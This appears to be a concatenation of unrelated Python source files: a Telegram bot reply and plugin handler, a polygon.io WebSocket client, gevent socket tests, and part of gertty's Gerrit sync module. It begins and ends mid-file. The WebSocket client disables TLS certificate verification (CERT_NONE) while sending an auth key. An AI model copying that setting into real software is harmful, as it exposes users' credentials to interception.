if redis.hexists("{}Nbot:{}:TXreplys".format(BOT_ID,chatID),text):
tx = redis.hget("{}Nbot:{}:TXreplys".format(BOT_ID,chatID),text)
try:
rep = {"#cn":"{cn}","#age":"{age}","#fn":"{fn}","#id":"{id}","#username":"{username}","#msgs":"{msgs}","#stast":"{stast}","#edits":"{edits}","#rate":"{rate}","{us}":"{username}","#us":"{username}"}
for v in rep.keys():
tx = tx.replace(v,rep[v])
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(fn=userFN,username=("@"+username or "n"),id=userID,stast=IDrank(redis,userID,chatID,r),cn=title),"reply_to_message_id":message.message_id,"parse_mode":"html"})
except Exception as e:
Bot("sendMessage",{"chat_id":chatID,"text":tx,"reply_to_message_id":message.message_id,"parse_mode":"html"})
if redis.hexists("{}Nbot:{}:STreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:STreplys".format(BOT_ID,chatID),text)
Bot("sendSticker",{"chat_id":chatID,"sticker":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:GFreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:GFreplys".format(BOT_ID,chatID),text)
Bot("sendanimation",{"chat_id":chatID,"animation":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:VOreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:VOreplys".format(BOT_ID,chatID),text)
Bot("sendvoice",{"chat_id":chatID,"voice":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:AUreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:AUreplys".format(BOT_ID,chatID),text)
Bot("sendaudio",{"chat_id":chatID,"audio":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:PHreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:PHreplys".format(BOT_ID,chatID),text)
Bot("sendphoto",{"chat_id":chatID,"photo":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:DOreplys".format(BOT_ID,chatID),text):
ID = redis.hget("{}Nbot:{}:DOreplys".format(BOT_ID,chatID),text)
Bot("sendDocument",{"chat_id":chatID,"document":ID,"reply_to_message_id":message.message_id})
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateMsgs,args=(client, message,redis))
t.daemon = True
t.start()
importlib.reload(U)
except Exception as e:
import traceback
traceback.print_exc()
print(e)
pass
|
websocket_client.py
|
import signal
import ssl
import threading
from typing import Optional, Callable
import websocket
STOCKS_CLUSTER = "stocks"
FOREX_CLUSTER = "forex"
CRYPTO_CLUSTER = "crypto"
class WebSocketClient:
DEFAULT_HOST = "socket.polygon.io"
# TODO: Either an instance of the client couples 1:1 with the cluster or an instance of the Client couples 1:3 with
# the 3 possible clusters (I think I like client per, but then a problem is the user can make multiple clients for
# the same cluster and that's not desirable behavior,
# somehow keeping track with multiple Client instances will be the difficulty)
def __init__(self, cluster: str, auth_key: str, process_message: Optional[Callable[[str], None]] = None,
on_close: Optional[Callable[[websocket.WebSocketApp], None]] = None,
on_error: Optional[Callable[[websocket.WebSocketApp, str], None]] = None):
self._host = self.DEFAULT_HOST
self.url = f"wss://{self._host}/{cluster}"
self.ws: websocket.WebSocketApp = websocket.WebSocketApp(self.url, on_open=self._default_on_open(),
on_close=self._default_on_close,
on_error=self._default_on_error,
on_message=self._default_on_message())
self.auth_key = auth_key
self.process_message = process_message
self.ws.on_close = on_close
self.ws.on_error = on_error
# being authenticated is an event that must occur before any other action is sent to the server
self._authenticated = threading.Event()
# self._run_thread is only set if the client is run asynchronously
self._run_thread: Optional[threading.Thread] = None
# TODO: this probably isn't great design.
# If the user defines their own signal handler then this will gets overwritten.
# We still need to make sure that killing, terminating, interrupting the program closes the connection
# signal.signal(signal.SIGINT, self._cleanup_signal_handler())
# signal.signal(signal.SIGTERM, self._cleanup_signal_handler())
def run(self):
self.ws.run_forever(skip_utf8_validation=True, sslopt={"cert_reqs": ssl.CERT_NONE})
def run_async(self):
self._run_thread = threading.Thread(target=self.run)
self._run_thread.start()
def close_connection(self):
self.ws.close()
if self._run_thread:
self._run_thread.join()
def subscribe(self, *params):
# TODO: make this a decorator or context manager
self._authenticated.wait()
sub_message = '{"action":"subscribe","params":"%s"}' % self._format_params(params)
self.ws.send(sub_message)
def unsubscribe(self, *params):
# TODO: make this a decorator or context manager
self._authenticated.wait()
sub_message = '{"action":"unsubscribe","params":"%s"}' % self._format_params(params)
self.ws.send(sub_message)
def _cleanup_signal_handler(self):
return lambda signalnum, frame: self.close_connection()
def _authenticate(self, ws):
ws.send('{"action":"auth","params":"%s"}' % self.auth_key)
self._authenticated.set()
@staticmethod
def _format_params(params):
return ",".join(params)
@property
def process_message(self):
return self.__process_message
@process_message.setter
def process_message(self, pm):
if pm:
self.__process_message = pm
self.ws.on_message = lambda ws, message: self.__process_message(message)
def _default_on_message(self):
return lambda ws, message: self._default_process_message(message)
@staticmethod
def _default_process_message(message):
print(message)
def _default_on_open(self):
def f(ws):
self._authenticate(ws)
return f
@staticmethod
def _default_on_error(ws, error):
print("error:", error)
@staticmethod
def _default_on_close(ws):
print("### closed ###")
|
test__socket.py
|
# This line can be commented out so that most tests run with the
# system socket for comparison.
from __future__ import print_function
from __future__ import absolute_import
from gevent import monkey; monkey.patch_all()
import sys
import array
import socket
import time
import unittest
from functools import wraps
from gevent._compat import reraise
import gevent.testing as greentest
from gevent.testing import six
from gevent.testing import LARGE_TIMEOUT
from gevent.testing import support
from gevent.testing import params
from gevent.testing.sockets import tcp_listener
from gevent.testing.skipping import skipWithoutExternalNetwork
# we use threading on purpose so that we can test both regular and
# gevent sockets with the same code
from threading import Thread as _Thread
from threading import Event
errno_types = int
class Thread(_Thread):
def __init__(self, **kwargs):
target = kwargs.pop('target')
self.terminal_exc = None
@wraps(target)
def errors_are_fatal(*args, **kwargs):
try:
return target(*args, **kwargs)
except: # pylint:disable=bare-except
self.terminal_exc = sys.exc_info()
raise
_Thread.__init__(self, target=errors_are_fatal, **kwargs)
self.start()
class TestTCP(greentest.TestCase):
__timeout__ = None
TIMEOUT_ERROR = socket.timeout
long_data = ", ".join([str(x) for x in range(20000)])
if not isinstance(long_data, bytes):
long_data = long_data.encode('ascii')
def setUp(self):
super(TestTCP, self).setUp()
if '-v' in sys.argv:
printed = []
try:
from time import perf_counter as now
except ImportError:
from time import time as now
def log(*args):
if not printed:
print()
printed.append(1)
print("\t ->", now(), *args)
orig_cot = self._close_on_teardown
def cot(o):
log("Registering for teardown", o)
def c():
log("Closing on teardown", o)
o.close()
orig_cot(c)
return o
self._close_on_teardown = cot
else:
def log(*_args):
"Does nothing"
self.log = log
self.listener = self._close_on_teardown(self._setup_listener())
# It is important to watch the lifetimes of socket objects and
# ensure that:
# (1) they are closed; and
# (2) *before* the next test begins.
#
# For example, it's a bad bad thing to leave a greenlet running past the
# scope of the individual test method if that greenlet will close
# a socket object --- especially if that socket object might also have been
# closed explicitly.
#
# On Windows, we've seen issue with filenos getting reused while something
# still thinks they have the original fileno around. When they later
# close that fileno, a completely unrelated object is closed.
self.port = self.listener.getsockname()[1]
def _setup_listener(self):
return tcp_listener()
def create_connection(self, host=None, port=None, timeout=None,
blocking=None):
sock = self._close_on_teardown(socket.socket())
sock.connect((host or params.DEFAULT_CONNECT, port or self.port))
if timeout is not None:
sock.settimeout(timeout)
if blocking is not None:
sock.setblocking(blocking)
return sock
def _test_sendall(self, data, match_data=None, client_method='sendall',
**client_args):
# pylint:disable=too-many-locals,too-many-branches,too-many-statements
log = self.log
log("Sendall", client_method)
read_data = []
accepted_event = Event()
def accept_and_read():
log("accepting", self.listener)
conn, _ = self.listener.accept()
try:
with conn.makefile(mode='rb') as r:
log("accepted on server", conn)
accepted_event.set()
log("reading")
read_data.append(r.read())
log("done reading")
del r
finally:
conn.close()
del conn
server = Thread(target=accept_and_read)
try:
log("creating client connection")
client = self.create_connection(**client_args)
# We seem to have a buffer stuck somewhere on appveyor?
# https://ci.appveyor.com/project/denik/gevent/builds/27320824/job/bdbax88sqnjoti6i#L712
should_unwrap = hasattr(client, 'unwrap') and greentest.PY37 and greentest.WIN
# The implicit reference-based nastiness of Python 2
# sockets interferes, especially when using SSL sockets.
# The best way to get a decent FIN to the server is to shutdown
# the output. Doing that on Python 3, OTOH, is contraindicated
# except on PyPy.
should_shutdown = greentest.PY2 or greentest.PYPY
# It's important to wait for the server to fully accept before
# we shutdown and close the socket. In SSL mode, the number
# and timing of data exchanges to complete the handshake and
# thus exactly when greenlet switches occur, varies by TLS version.
#
# It turns out that on < TLS1.3, we were getting lucky and the
# server was the greenlet that raced ahead and blocked in r.read()
# before the client returned from create_connection().
#
# But when TLS 1.3 was deployed (OpenSSL 1.1), the *client* was the
# one that raced ahead while the server had yet to return from
# self.listener.accept(). So the client sent the data to the socket,
# and closed, before the server could do anything, and the server,
# when it got switched to by server.join(), found its new socket
# dead.
accepted_event.wait()
log("accepted", client)
try:
getattr(client, client_method)(data)
except:
import traceback; traceback.print_exc()
# unwrapping might not work after this because we're in
# a bad state.
if should_unwrap:
client.shutdown(socket.SHUT_RDWR)
should_unwrap = False
should_shutdown = False
raise
finally:
log("shutdown")
if should_shutdown:
client.shutdown(socket.SHUT_RDWR)
elif should_unwrap:
try:
client.unwrap()
except OSError as e:
if greentest.PY37 and greentest.WIN and e.errno == 0:
# ? 3.7.4 on AppVeyor sometimes raises
# "OSError[errno 0] Error" here, which doesn't make
# any sense.
pass
else:
raise
log("closing")
client.close()
finally:
server.join(10)
assert not server.is_alive()
if server.terminal_exc:
reraise(*server.terminal_exc)
if match_data is None:
match_data = self.long_data
self.assertEqual(read_data, [match_data])
def test_sendall_str(self):
self._test_sendall(self.long_data)
if six.PY2:
def test_sendall_unicode(self):
self._test_sendall(six.text_type(self.long_data))
def test_sendall_array(self):
data = array.array("B", self.long_data)
self._test_sendall(data)
def test_sendall_empty(self):
data = b''
self._test_sendall(data, data)
def test_sendall_empty_with_timeout(self):
# Issue 719
data = b''
self._test_sendall(data, data, timeout=10)
def test_sendall_nonblocking(self):
# https://github.com/benoitc/gunicorn/issues/1282
# Even if the socket is non-blocking, we make at least
# one attempt to send data. Under Py2 before this fix, we
# would incorrectly immediately raise a timeout error
data = b'hi\n'
self._test_sendall(data, data, blocking=False)
def test_empty_send(self):
# Issue 719
data = b''
self._test_sendall(data, data, client_method='send')
def test_fullduplex(self):
N = 100000
def server():
remote_client, _ = self.listener.accept()
self._close_on_teardown(remote_client)
# start reading, then, while reading, start writing. the reader should not hang forever
sender = Thread(target=remote_client.sendall,
args=((b't' * N),))
try:
result = remote_client.recv(1000)
self.assertEqual(result, b'hello world')
finally:
sender.join()
server_thread = Thread(target=server)
client = self.create_connection()
client_file = self._close_on_teardown(client.makefile())
client_reader = Thread(target=client_file.read, args=(N, ))
time.sleep(0.1)
client.sendall(b'hello world')
time.sleep(0.1)
# close() used to hang
client_file.close()
client.close()
# this tests "full duplex" bug;
server_thread.join()
client_reader.join()
def test_recv_timeout(self):
def accept():
# make sure the conn object stays alive until the end;
# premature closing triggers a ResourceWarning and
# EOF on the client.
conn, _ = self.listener.accept()
self._close_on_teardown(conn)
acceptor = Thread(target=accept)
client = self.create_connection()
try:
client.settimeout(1)
start = time.time()
with self.assertRaises(self.TIMEOUT_ERROR):
client.recv(1024)
took = time.time() - start
self.assertTimeWithinRange(took, 1 - 0.1, 1 + 0.1)
finally:
acceptor.join()
# Subclasses can disable this
_test_sendall_timeout_check_time = True
# Travis-CI container infrastructure is configured with
# large socket buffers, at least 2MB, as-of Jun 3, 2015,
# so we must be sure to send more data than that.
# In 2018, this needs to be increased *again* as a smaller value was
# still often being sent.
_test_sendall_data = b'hello' * 100000000
# This doesn't make much sense...why are we really skipping this?
@greentest.skipOnWindows("On Windows send() accepts whatever is thrown at it")
def test_sendall_timeout(self):
client_sock = []
acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
client = self.create_connection()
time.sleep(0.1)
assert client_sock
client.settimeout(0.1)
start = time.time()
try:
with self.assertRaises(self.TIMEOUT_ERROR):
client.sendall(self._test_sendall_data)
if self._test_sendall_timeout_check_time:
took = time.time() - start
self.assertTimeWithinRange(took, 0.09, 0.2)
finally:
acceptor.join()
client.close()
client_sock[0][0].close()
def test_makefile(self):
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.flush()
fd.close()
conn.close() # for pypy
acceptor = Thread(target=accept_once)
try:
client = self.create_connection()
# Closing the socket doesn't close the file
client_file = client.makefile(mode='rb')
client.close()
line = client_file.readline()
self.assertEqual(line, b'hello\n')
self.assertEqual(client_file.read(), b'')
client_file.close()
finally:
acceptor.join()
def test_makefile_timeout(self):
def accept_once():
conn, _ = self.listener.accept()
try:
time.sleep(0.3)
finally:
conn.close() # for pypy
acceptor = Thread(target=accept_once)
try:
client = self.create_connection()
client.settimeout(0.1)
fd = client.makefile(mode='rb')
self.assertRaises(self.TIMEOUT_ERROR, fd.readline)
client.close()
fd.close()
finally:
acceptor.join()
def test_attributes(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
self.assertEqual(socket.AF_INET, s.type)
self.assertEqual(socket.SOCK_DGRAM, s.family)
self.assertEqual(0, s.proto)
if hasattr(socket, 'SOCK_NONBLOCK'):
s.settimeout(1)
self.assertEqual(socket.AF_INET, s.type)
s.setblocking(0)
std_socket = monkey.get_original('socket', 'socket')(socket.AF_INET, socket.SOCK_DGRAM, 0)
try:
std_socket.setblocking(0)
self.assertEqual(std_socket.type, s.type)
finally:
std_socket.close()
s.close()
def test_connect_ex_nonblocking_bad_connection(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.setblocking(False)
ret = s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, support.find_unused_port()))
self.assertIsInstance(ret, errno_types)
finally:
s.close()
@skipWithoutExternalNetwork("Tries to resolve hostname")
def test_connect_ex_gaierror(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
with self.assertRaises(socket.gaierror):
s.connect_ex(('foo.bar.fizzbuzz', support.find_unused_port()))
finally:
s.close()
def test_connect_ex_nonblocking_overflow(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.setblocking(False)
with self.assertRaises(OverflowError):
s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, 65539))
finally:
s.close()
@unittest.skipUnless(hasattr(socket, 'SOCK_CLOEXEC'),
"Requires SOCK_CLOEXEC")
def test_connect_with_type_flags_ignored(self):
# Issue 944
# If we have SOCK_CLOEXEC or similar, we shouldn't be passing
# them through to the getaddrinfo call that connect() makes
SOCK_CLOEXEC = socket.SOCK_CLOEXEC # pylint:disable=no-member
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM | SOCK_CLOEXEC)
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.close()
conn.close()
acceptor = Thread(target=accept_once)
try:
s.connect((params.DEFAULT_CONNECT, self.port))
fd = s.makefile(mode='rb')
self.assertEqual(fd.readline(), b'hello\n')
fd.close()
s.close()
finally:
acceptor.join()
class TestCreateConnection(greentest.TestCase):
__timeout__ = LARGE_TIMEOUT
def test_refuses(self, **conn_args):
connect_port = support.find_unused_port()
with self.assertRaisesRegex(
socket.error,
# We really expect "connection refused". It's unclear
# where/why we would get '[errno -2] name or service not known'
# but it seems some systems generate that.
# https://github.com/gevent/gevent/issues/1389
# Somehow extremly rarely we've also seen 'address already in use',
# which makes even less sense.
'refused|not known|already in use'
):
socket.create_connection(
(greentest.DEFAULT_BIND_ADDR, connect_port),
timeout=30,
**conn_args
)
def test_refuses_from_port(self):
source_port = support.find_unused_port()
# Usually we don't want to bind/connect to '', but
# using it as the source is required if we don't want to hang,
# at least on some systems (OS X)
self.test_refuses(source_address=('', source_port))
@greentest.ignores_leakcheck
@skipWithoutExternalNetwork("Tries to resolve hostname")
def test_base_exception(self):
# such as a GreenletExit or a gevent.timeout.Timeout
class E(BaseException):
pass
class MockSocket(object):
created = ()
closed = False
def __init__(self, *_):
MockSocket.created += (self,)
def connect(self, _):
raise E(_)
def close(self):
self.closed = True
def mockgetaddrinfo(*_):
return [(1, 2, 3, 3, 5),]
import gevent.socket as gsocket
# Make sure we're monkey patched
self.assertEqual(gsocket.create_connection, socket.create_connection)
orig_socket = gsocket.socket
orig_getaddrinfo = gsocket.getaddrinfo
try:
gsocket.socket = MockSocket
gsocket.getaddrinfo = mockgetaddrinfo
with self.assertRaises(E):
socket.create_connection(('host', 'port'))
self.assertEqual(1, len(MockSocket.created))
self.assertTrue(MockSocket.created[0].closed)
finally:
MockSocket.created = ()
gsocket.socket = orig_socket
gsocket.getaddrinfo = orig_getaddrinfo
class TestFunctions(greentest.TestCase):
@greentest.ignores_leakcheck
# Creating new types in the function takes a cycle to cleanup.
def test_wait_timeout(self):
# Issue #635
import gevent.socket
import gevent._socketcommon
class io(object):
callback = None
def start(self, *_args):
gevent.sleep(10)
with self.assertRaises(gevent.socket.timeout):
gevent.socket.wait(io(), timeout=0.01) # pylint:disable=no-member
def test_signatures(self):
# https://github.com/gevent/gevent/issues/960
exclude = []
if greentest.PYPY:
# Up through at least PyPy 5.7.1, they define these as
# gethostbyname(host), whereas the official CPython argument name
# is hostname. But cpython doesn't allow calling with keyword args.
# Likewise for gethostbyaddr: PyPy uses host, cpython uses ip_address
exclude.append('gethostbyname')
exclude.append('gethostbyname_ex')
exclude.append('gethostbyaddr')
self.assertMonkeyPatchedFuncSignatures('socket', exclude=exclude)
class TestSocket(greentest.TestCase):
def test_shutdown_when_closed(self):
# https://github.com/gevent/gevent/issues/1089
# we once raised an AttributeError.
s = socket.socket()
s.close()
with self.assertRaises(socket.error):
s.shutdown(socket.SHUT_RDWR)
if __name__ == '__main__':
greentest.main()
|
sync.py
|
# Copyright 2014 OpenStack Foundation
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import errno
import logging
import math
import os
import re
import threading
import json
import time
import datetime
import dateutil.parser
try:
import ordereddict
except:
pass
import requests
import requests.utils
import six
from six.moves import queue
from six.moves.urllib import parse as urlparse
import gertty.version
from gertty import gitrepo
from gertty.auth import FormAuth
HIGH_PRIORITY=0
NORMAL_PRIORITY=1
LOW_PRIORITY=2
TIMEOUT=30
CLOSED_STATUSES = ['MERGED', 'ABANDONED']
class OfflineError(Exception):
pass
class MultiQueue(object):
def __init__(self, priorities):
try:
self.queues = collections.OrderedDict()
except AttributeError:
self.queues = ordereddict.OrderedDict()
for key in priorities:
self.queues[key] = collections.deque()
self.condition = threading.Condition()
self.incomplete = []
def qsize(self):
count = 0
self.condition.acquire()
try:
for queue in self.queues.values():
count += len(queue)
return count + len(self.incomplete)
finally:
self.condition.release()
def put(self, item, priority):
added = False
self.condition.acquire()
try:
if item not in self.queues[priority]:
self.queues[priority].append(item)
added = True
self.condition.notify()
finally:
self.condition.release()
return added
def get(self):
self.condition.acquire()
try:
while True:
for queue in self.queues.values():
try:
ret = queue.popleft()
self.incomplete.append(ret)
return ret
except IndexError:
pass
self.condition.wait()
finally:
self.condition.release()
def find(self, klass, priority):
results = []
self.condition.acquire()
try:
for item in self.queues[priority]:
if isinstance(item, klass):
results.append(item)
finally:
self.condition.release()
return results
def complete(self, item):
self.condition.acquire()
try:
if item in self.incomplete:
self.incomplete.remove(item)
finally:
self.condition.release()
class UpdateEvent(object):
def updateRelatedChanges(self, session, change):
related_change_keys = set()
related_change_keys.add(change.key)
for revision in change.revisions:
parent = session.getRevisionByCommit(revision.parent)
if parent:
related_change_keys.add(parent.change.key)
for child in session.getRevisionsByParent(revision.commit):
related_change_keys.add(child.change.key)
self.related_change_keys = related_change_keys
class ProjectAddedEvent(UpdateEvent):
def __repr__(self):
return '<ProjectAddedEvent project_key:%s>' % (
self.project_key,)
def __init__(self, project):
self.project_key = project.key
class ChangeAddedEvent(UpdateEvent):
def __repr__(self):
return '<ChangeAddedEvent project_key:%s change_key:%s>' % (
self.project_key, self.change_key)
def __init__(self, change):
self.project_key = change.project.key
self.change_key = change.key
self.related_change_keys = set()
self.review_flag_changed = True
self.status_changed = True
self.held_changed = False
class ChangeUpdatedEvent(UpdateEvent):
def __repr__(self):
return '<ChangeUpdatedEvent project_key:%s change_key:%s review_flag_changed:%s status_changed:%s>' % (
self.project_key, self.change_key, self.review_flag_changed, self.status_changed)
def __init__(self, change):
self.project_key = change.project.key
self.change_key = change.key
self.related_change_keys = set()
self.review_flag_changed = False
self.status_changed = False
self.held_changed = False
class Task(object):
def __init__(self, priority=NORMAL_PRIORITY):
self.log = logging.getLogger('gertty.sync')
self.priority = priority
self.succeeded = None
self.event = threading.Event()
self.tasks = []
self.results = []
def complete(self, success):
self.succeeded = success
self.event.set()
def wait(self, timeout=None):
self.event.wait(timeout)
return self.succeeded
def __eq__(self, other):
raise NotImplementedError()
class SyncOwnAccountTask(Task):
def __repr__(self):
return '<SyncOwnAccountTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
remote = sync.get('accounts/self')
sync.account_id = remote['_account_id']
with app.db.getSession() as session:
session.getAccountByID(remote['_account_id'],
remote.get('name'),
remote.get('username'),
remote.get('email'))
class GetVersionTask(Task):
def __repr__(self):
return '<GetVersionTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
version = sync.get('config/server/version')
sync.setRemoteVersion(version)
class SyncProjectListTask(Task):
def __repr__(self):
return '<SyncProjectListTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
remote = sync.get('projects/?d')
remote_keys = set(remote.keys())
with app.db.getSession() as session:
local = {}
for p in session.getProjects():
local[p.name] = p
local_keys = set(local.keys())
for name in local_keys-remote_keys:
session.delete(local[name])
for name in remote_keys-local_keys:
p = remote[name]
project = session.createProject(name,
description=p.get('description', ''))
self.log.info("Created project %s", project.name)
self.results.append(ProjectAddedEvent(project))
class SyncSubscribedProjectBranchesTask(Task):
def __repr__(self):
return '<SyncSubscribedProjectBranchesTask>'
def __eq__(self, other):
if other.__class__ == self.__class__:
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
projects = session.getProjects(subscribed=True)
for p in projects:
sync.submitTask(SyncProjectBranchesTask(p.name, self.priority))
class SyncProjectBranchesTask(Task):
branch_re = re.compile(r'refs/heads/(.*)')
def __init__(self, project_name, priority=NORMAL_PRIORITY):
super(SyncProjectBranchesTask, self).__init__(priority)
self.project_name = project_name
def __repr__(self):
return '<SyncProjectBranchesTask %s>' % (self.project_name,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_name == self.project_name):
return True
return False
def run(self, sync):
app = sync.app
remote = sync.get('projects/%s/branches/' % urlparse.quote_plus(self.project_name))
remote_branches = set()
for x in remote:
m = self.branch_re.match(x['ref'])
if m:
remote_branches.add(m.group(1))
with app.db.getSession() as session:
local = {}
project = session.getProjectByName(self.project_name)
for branch in project.branches:
local[branch.name] = branch
local_branches = set(local.keys())
for name in local_branches-remote_branches:
session.delete(local[name])
self.log.info("Deleted branch %s from project %s in local DB.", name, project.name)
for name in remote_branches-local_branches:
project.createBranch(name)
self.log.info("Added branch %s to project %s in local DB.", name, project.name)
class SyncSubscribedProjectsTask(Task):
def __repr__(self):
return '<SyncSubscribedProjectsTask>'
def __eq__(self, other):
if (other.__class__ == self.__class__):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
keys = [p.key for p in session.getProjects(subscribed=True)]
for i in range(0, len(keys), 10):
t = SyncProjectTask(keys[i:i+10], self.priority)
self.tasks.append(t)
sync.submitTask(t)
t = SyncQueriedChangesTask('owner', 'is:owner', self.priority)
self.tasks.append(t)
sync.submitTask(t)
t = SyncQueriedChangesTask('starred', 'is:starred', self.priority)
self.tasks.append(t)
sync.submitTask(t)
class SyncProjectTask(Task):
def __init__(self, project_keys, priority=NORMAL_PRIORITY):
super(SyncProjectTask, self).__init__(priority)
if type(project_keys) == int:
project_keys = [project_keys]
self.project_keys = project_keys
def __repr__(self):
return '<SyncProjectTask %s>' % (self.project_keys,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_keys == self.project_keys):
return True
return False
def run(self, sync):
app = sync.app
now = datetime.datetime.utcnow()
queries = []
with app.db.getSession() as session:
for project_key in self.project_keys:
project = session.getProject(project_key)
query = 'q=project:%s' % project.name
if project.updated:
# Allow 4 seconds for request time, etc.
query += ' -age:%ss' % (int(math.ceil((now-project.updated).total_seconds())) + 4,)
else:
query += ' status:open'
queries.append(query)
changes = sync.query(queries)
change_ids = [c['id'] for c in changes]
with app.db.getSession() as session:
# Winnow the list of IDs to only the ones in the local DB.
change_ids = session.getChangeIDs(change_ids)
for c in changes:
# For now, just sync open changes or changes already
# in the db optionally we could sync all changes ever
if c['id'] in change_ids or (c['status'] not in CLOSED_STATUSES):
sync.submitTask(SyncChangeTask(c['id'], priority=self.priority))
for key in self.project_keys:
sync.submitTask(SetProjectUpdatedTask(key, now, priority=self.priority))
class SetProjectUpdatedTask(Task):
def __init__(self, project_key, updated, priority=NORMAL_PRIORITY):
super(SetProjectUpdatedTask, self).__init__(priority)
self.project_key = project_key
self.updated = updated
def __repr__(self):
return '<SetProjectUpdatedTask %s %s>' % (self.project_key, self.updated)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.project_key == self.project_key and
other.updated == self.updated):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
project = session.getProject(self.project_key)
project.updated = self.updated
class SyncQueriedChangesTask(Task):
def __init__(self, query_name, query, priority=NORMAL_PRIORITY):
super(SyncQueriedChangesTask, self).__init__(priority)
self.query_name = query_name
self.query = query
def __repr__(self):
return '<SyncQueriedChangesTask %s>' % self.query_name
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.query_name == self.query_name and
other.query == self.query):
return True
return False
def run(self, sync):
app = sync.app
now = datetime.datetime.utcnow()
with app.db.getSession() as session:
sync_query = session.getSyncQueryByName(self.query_name)
query = 'q=%s' % self.query
if sync_query.updated:
# Allow 4 seconds for request time, etc.
query += ' -age:%ss' % (int(math.ceil((now-sync_query.updated).total_seconds())) + 4,)
else:
query += ' status:open'
for project in session.getProjects(subscribed=True):
query += ' -project:%s' % project.name
changes = []
sortkey = ''
done = False
offset = 0
while not done:
# We don't actually want to limit to 500, but that's the server-side default, and
# if we don't specify this, we won't get a _more_changes flag.
q = 'changes/?n=500%s&%s' % (sortkey, query)
self.log.debug('Query: %s ' % (q,))
batch = sync.get(q)
done = True
if batch:
changes += batch
if '_more_changes' in batch[-1]:
done = False
if '_sortkey' in batch[-1]:
sortkey = '&N=%s' % (batch[-1]['_sortkey'],)
else:
offset += len(batch)
sortkey = '&start=%s' % (offset,)
change_ids = [c['id'] for c in changes]
with app.db.getSession() as session:
# Winnow the list of IDs to only the ones in the local DB.
change_ids = session.getChangeIDs(change_ids)
for c in changes:
# For now, just sync open changes or changes already
# in the db optionally we could sync all changes ever
if c['id'] in change_ids or (c['status'] not in CLOSED_STATUSES):
sync.submitTask(SyncChangeTask(c['id'], priority=self.priority))
sync.submitTask(SetSyncQueryUpdatedTask(self.query_name, now, priority=self.priority))
class SetSyncQueryUpdatedTask(Task):
def __init__(self, query_name, updated, priority=NORMAL_PRIORITY):
super(SetSyncQueryUpdatedTask, self).__init__(priority)
self.query_name = query_name
self.updated = updated
def __repr__(self):
return '<SetSyncQueryUpdatedTask %s %s>' % (self.query_name, self.updated)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.query_name == self.query_name and
other.updated == self.updated):
return True
return False
def run(self, sync):
app = sync.app
with app.db.getSession() as session:
sync_query = session.getSyncQueryByName(self.query_name)
sync_query.updated = self.updated
class SyncChangesByCommitsTask(Task):
def __init__(self, commits, priority=NORMAL_PRIORITY):
super(SyncChangesByCommitsTask, self).__init__(priority)
self.commits = commits
def __repr__(self):
return '<SyncChangesByCommitsTask %s>' % (self.commits,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.commits == self.commits):
return True
return False
def run(self, sync):
query = ' OR '.join(['commit:%s' % x for x in self.commits])
changes = sync.get('changes/?q=%s' % query)
self.log.debug('Query: %s ' % (query,))
for c in changes:
sync.submitTask(SyncChangeTask(c['id'], priority=self.priority))
self.log.debug("Sync change %s for its commit" % (c['id'],))
def addCommit(self, commit):
if commit in self.commits:
return True
# 100 should be under the URL length limit
if len(self.commits) >= 100:
return False
self.commits.append(commit)
return True
class SyncChangeByNumberTask(Task):
def __init__(self, number, priority=NORMAL_PRIORITY):
super(SyncChangeByNumberTask, self).__init__(priority)
self.number = number
def __repr__(self):
return '<SyncChangeByNumberTask %s>' % (self.number,)
def __eq__(self, other):
if (other.__class__ == self.__class__ and
other.number == self.number):
return True
return False
def run(self, sync):
query = '%s' % self.number
changes = sync.get('changes/?q=%s' % query)
